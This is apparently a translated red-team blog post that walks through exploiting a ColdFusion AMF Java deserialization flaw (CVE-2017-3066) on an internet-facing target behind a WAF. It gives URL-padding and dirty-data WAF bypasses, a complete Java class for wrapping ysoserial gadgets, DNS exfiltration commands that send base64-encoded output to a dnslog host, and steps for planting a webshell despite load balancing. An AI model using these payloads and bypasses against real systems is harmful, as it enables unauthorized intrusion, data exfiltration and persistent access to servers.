
Red Team, Chapter 10: ColdFusion deserialization, the arduous road from WAF bypass to exploit to taking the target

2022-07-01 16:20:00 User 6293454

Part1 Preface

Hello everyone. Last week I shared two red team technique articles, "How to give any Java program a Socks5 proxy" and "The arduous process of exploiting an upload vulnerability by blind-guessing the request body", and the response was good. This issue shares a case of getting a Java deserialization exploit past a WAF. The target application was an Adobe ColdFusion dynamic web server; the corresponding vulnerability is CVE-2017-3066 (Java deserialization through the AMF gateway of the bundled Apache BlazeDS library), which I have used many times to gain access. The target sat directly on the public internet behind a WAF, and that WAF could recognise deserialization attack packets. I spent two or three days bypassing layer after layer of protection, passing one checkpoint after another, and finally got a shell. The process was very arduous.

Part2 Technical research process

  • Pit 1: getting past the WAF, round one

The WAF first intercepted on the URL path. A directory scan turned up the path /flex2gateway/amf, which at a glance suggests a ColdFusion (AMF) deserialization vulnerability; in fact it was exposed directly under the web root of the internet-facing target. But don't celebrate too early: testing showed that as soon as /flex2gateway/amf was accessed with a POST request, the WAF intercepted it. In other words, for POST requests the WAF matches on this path and treats any hit as an attack, so it blocks it. Here is the bypass:

Turn the URL path /flex2gateway/amf into:

http://www.xxx.com//////////////////////////////////////////flex2gateway///////////////////////////////amf

(the run of slashes is actually much longer than shown above; it is abbreviated here to save space)

The result was still intercepted by the WAF. The next step was to add an oversized string as well, like this:

http://www.xxx.com//////////////////////////////////////////flex2gateway///////////////////////////////amf?abc123=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

With that, we bypassed the WAF's detection of the URL path. The likely explanation is that the WAF matches on the raw request line, while the servlet container normalises the repeated slashes before routing the request to the gateway; the oversized query string pushes the request past the size the WAF is willing to inspect, which is also what lets the oversized POST bodies through in pit 4 below.

  • Pit 2: a particular script will crash the site

For exploiting this vulnerability, the script cf_blazeds_des.py used to be the go-to, but it needs special care. It exploits the deserialization through the sun.rmi.server.UnicastRef class, which requires the server to have outbound network access (the target connects back to a JRMP listener you control). In the last two ColdFusion deserialization cases I ran into, the situation where you can directly bounce a shell out to the internet is getting rarer; at best DNS gets out. Then there is a huge pit: using this script requires doing your homework in advance so that a single packet succeeds, because after three to five packets the application is bound to hang. So I hardly ever use this script unless I have to.

  • Pit 3: getting ColdFusionPwn to work

Next, I needed a way to exploit this vulnerability without outbound network access. After various searches on GitHub, the ColdFusionPwn tool looked good; it is also written in Java, so if I hit problems I could modify it myself. Who knew that when it came time to really use the tool it kept erroring out with "unable to load main class". It used to work fine, but today I could not get it to run, and I had no idea where the problem was.

From the tool's instructions, ColdFusionPwn depends on the ysoserial jar. So I simply downloaded the author's Java code, imported it into ysoserial with IntelliJ IDEA, changed the code flow a little, and now it generates the payload normally on its own. -s and -e are ColdFusionPwn's two different payload generation modes, which is to say two different ways of exploiting the vulnerability; both can be tried during testing.

  • Pit 4: getting past the WAF, round two

After generating the payload with the code from the previous step, I loaded it into Burp Suite's Repeater and sent the packet. The WAF intercepted the POST body again: on clicking "Send", the WAF simply dropped the packet and quickly returned an empty response.

Next, after a series of tests, I found that the WAF device lets oversized packets through, as shown in the figure (not reproduced here); the WAF does not intercept them.

But simply prepending dirty data in front of the serialized bytes is definitely not going to work, because then the deserialization attack code can never be triggered (the stream no longer begins with a valid object). Then I remembered the Java deserialization article by my former colleague "Memories float like snow" on adding dirty data (linked in the summary), so I downloaded his Java code, and after some wrangling wrote the author's DirtyDataWrapper class into my own ysoserial, so that the deserialization packet generated by ColdFusionPwn is mixed with dirty data.

The final generated attack code is shown in the figure (not reproduced here):

  • Pit 5: getting past the WAF, round three

Looking at the screenshot above again, it was still intercepted by the WAF, and I had no idea why. After a lot of testing and analysis I finally discovered that as long as the POST packet contains the class name keyword java.util.LinkedList, the WAF drops the packet outright. Sigh, it is so hard. So I went back to the Java code of "Memories float like snow" and tried to modify it. In the end I found a simple solution: set the type value in his DirtyDataWrapper class to 0. The dirty-data packets generated that way do not contain the sensitive class the WAF intercepts. I won't explain here why exactly this change works; you can find the relevant code on GitHub and analyse it yourself.

The payload generated this way bypassed the WAF perfectly.
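The dirty-data wrapping behind pits 4 and 5 fits in a few lines of Java. The following is an added example written for this page; it is neither the author's modified ysoserial nor the DirtyDataWrapper class from the gv7.me article, and the ColdFusionPwn/AMF layer is left out. It assumes the target ends up calling ObjectInputStream.readObject() on attacker-controlled bytes and that the gadget object comes from ysoserial (the makePayloadObject call and the cmd variable are assumptions shown only in a comment; the runnable code uses a harmless placeholder object). The idea is to serialise an outer collection whose first element is a multi-megabyte byte[] and whose second element is the gadget: a WAF that gives up on large bodies sees only the wrapper class and junk at the front, while ArrayList.readObject() and LinkedList.readObject() still call readObject() on every element, so the gadget fires. The wrapper must be applied to the object graph before serialisation; splicing junk into an already generated stream does not work, because back-references in Java serialization are numbered by position in the stream. The type parameter mirrors the page's type=0 fix: choosing ArrayList keeps the string java.util.LinkedList out of the stream, and a byte search over the output lets you confirm that before sending.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;

// Added example for this page: wraps a gadget object with dirty data before
// serialisation. Not the article's code and not the gv7.me DirtyDataWrapper.
public class DirtyWrap {

    public static final int TYPE_ARRAYLIST = 0;   // stream names java.util.ArrayList, never java.util.LinkedList
    public static final int TYPE_LINKEDLIST = 1;  // stream names java.util.LinkedList (the keyword matched in pit 5)

    /**
     * Serialises [junk, gadget] as a single stream. The junk byte[] is read
     * first and is harmless; the collection's readObject() then deserialises
     * the gadget element, so the chain still triggers.
     */
    public static byte[] wrap(Object gadget, int dirtyLength, int type) throws IOException {
        byte[] junk = new byte[dirtyLength];
        Arrays.fill(junk, (byte) 'A');              // any filler works; random bytes are fine too
        List<Object> outer = (type == TYPE_LINKEDLIST) ? new LinkedList<Object>() : new ArrayList<Object>();
        outer.add(junk);
        outer.add(gadget);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(outer);                 // wrapper and gadget share one stream, so handles stay valid
        }
        return bos.toByteArray();
    }

    /** Pre-flight check: does the stream still contain a class name the WAF is known to block? */
    public static boolean containsClassName(byte[] stream, String className) {
        byte[] needle = className.getBytes(StandardCharsets.UTF_8); // class names are written as (modified) UTF-8
        scan:
        for (int i = 0; i + needle.length <= stream.length; i++) {
            for (int j = 0; j < needle.length; j++) {
                if (stream[i + j] != needle[j]) continue scan;
            }
            return true;
        }
        return false;
    }

    public static void main(String[] args) throws Exception {
        // With ysoserial on the classpath the gadget would come from (assumed ysoserial API, cmd assumed):
        //   Object gadget = ysoserial.payloads.ObjectPayload.Utils.makePayloadObject("CommonsCollections6", cmd);
        // A plain HashMap stands in here so the example runs without ysoserial.
        Object gadget = new HashMap<String, String>();
        int dirtyLength = args.length > 0 ? Integer.parseInt(args[0]) : 5 * 1024 * 1024;

        byte[] blocked = wrap(gadget, dirtyLength, TYPE_LINKEDLIST);
        byte[] passing = wrap(gadget, dirtyLength, TYPE_ARRAYLIST);
        System.out.println("LinkedList wrapper contains java.util.LinkedList: "
                + containsClassName(blocked, "java.util.LinkedList"));
        System.out.println("ArrayList wrapper contains java.util.LinkedList:  "
                + containsClassName(passing, "java.util.LinkedList"));
        System.out.println("ArrayList wrapper size: " + passing.length + " bytes; the gadget sits after the junk");

        Files.write(Paths.get("payload.ser"), passing);   // hand this to the AMF wrapper or Burp Repeater
    }
}
```

Compile and run with `javac DirtyWrap.java && java DirtyWrap 5242880`, then grep the resulting payload.ser for the other class names the gadget chain introduces; the junk size is the knob to turn when the WAF still answers, and the class-name check is what catches the pit-5 situation before the packet leaves Burp.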

  • Pit 6: ysoserial command execution

Next, find a way to get a shell and take the target. Unfortunately the server has no outbound connectivity, so there is no direct reverse shell. After testing, the conclusion was: TCP does not get out, but DNS does. So I thought of a way: read the web path bit by bit via DNSlog, and if reading it byte by byte is too slow, combine Linux commands to read it in pieces; then write a webshell under that web path.

But then a new problem came up. In practice the URLDNS gadget chain could get out to the network, but `ping xxx.dnslog.cn` would not get out no matter what... Reading the operating system name over DNS showed the target server was Linux. Finally I set up a local ColdFusion environment, and after a series of tests found that the problem was in the command execution of ysoserial's Gadgets class.

Note: for this test case I rewrote the executed command several ways, and after many experiments the command had to be written as shown in the figure (not reproduced here) for it to execute successfully. I was seeing this for the first time; other ways of writing it did not work. That is the conclusion of practice; it is so hard. The mechanism behind it is that the Gadgets class runs the command through Runtime.getRuntime().exec(String), which splits the string on whitespace and does not invoke a shell, so pipes, backticks and quoting in a command like the ping above have no meaning unless the command explicitly starts a shell and hands the whole pipeline to it as one argument.

  • Pit 7: dnslog length limit

The web path can be read out via DNSLOG, and once you have it you can write a shell directly and you have your access. But dnslog just would not return the path result. Then it dawned on me: DNSlog has a length limit, and the target's web path must be too long. So after testing, I combined the Linux built-in sed and cut to read the site's absolute path piece by piece with the method below (xxx.dnslog.cn stands in for your own DNSlog or Collaborator domain, as elsewhere in this article). Ha, sharing it with you.

ping `pwd|base64|sed -n '1p'|cut -c 1-60`.xxx.dnslog.cn

ping `pwd|base64|sed -n '1p'|cut -c 61-80`.xxx.dnslog.cn

A few caveats when adapting this. The limit comes from DNS itself: a single label may be at most 63 characters and the whole name at most 253, which is why the chunks are cut at 60. GNU base64 wraps its output at 76 characters, so `sed -n '1p'` keeps only the first line; for longer paths use `base64 -w0` or read the second line with `sed -n '2p'`, otherwise the second chunk silently loses everything past character 76. The base64 alphabet also includes '+', '/' and '=', which are not valid in hostnames, so a chunk containing one of them never resolves and never shows up in the log; hex-encoding the output (for example with od or xxd) avoids both problems. Note too that pwd returns the working directory of the ColdFusion process, which is what was used as the web path here.

It is best to use Burp's Collaborator client; it is very easy to use and very stable. If you use dnslog, the browser often gets stuck and the dnslog records never appear, so you have to change the domain name, which is a real hassle. All kinds of inexplicable problems come up in real engagements; later, after getting the shell, I found the problem was load balancing...

  • Pit 8: load balancing

After writing the webshell, I found the shell could not be reached. Had it been deleted? Suddenly I slapped my leg: damn, this site even has load balancing! No wonder there were always inexplicable problems when testing the vulnerability early on... So I opened Burp Suite's Intruder and fired the shell-writing payload hundreds of times, after which the success rate of reaching the webshell went up greatly... I have no good solution for load balancing; the trick of adding a cookie to pin the session could not be used here.

This case actually had more pits than the above, with many twists and turns, but quite some time has passed and I cannot remember many of the details. The key points are the ones above. Corrections are welcome; message me with your advice.

Part3 Summary

1. When exploiting deserialization vulnerabilities, you often have to modify the exploit to adapt it to different environments.

2. Build more test environments to avoid walking into a dead end.

3. Reference, the article by "Memories float like snow": https://gv7.me/articles/2021/java-deserialize-data-bypass-waf-by-adding-a-lot-of-dirty-data/


Copyright notice
This article was written by [User 6293454]; please include the original link when reprinting. Thank you.
https://yzsam.com/2022/182/202207011611027424.html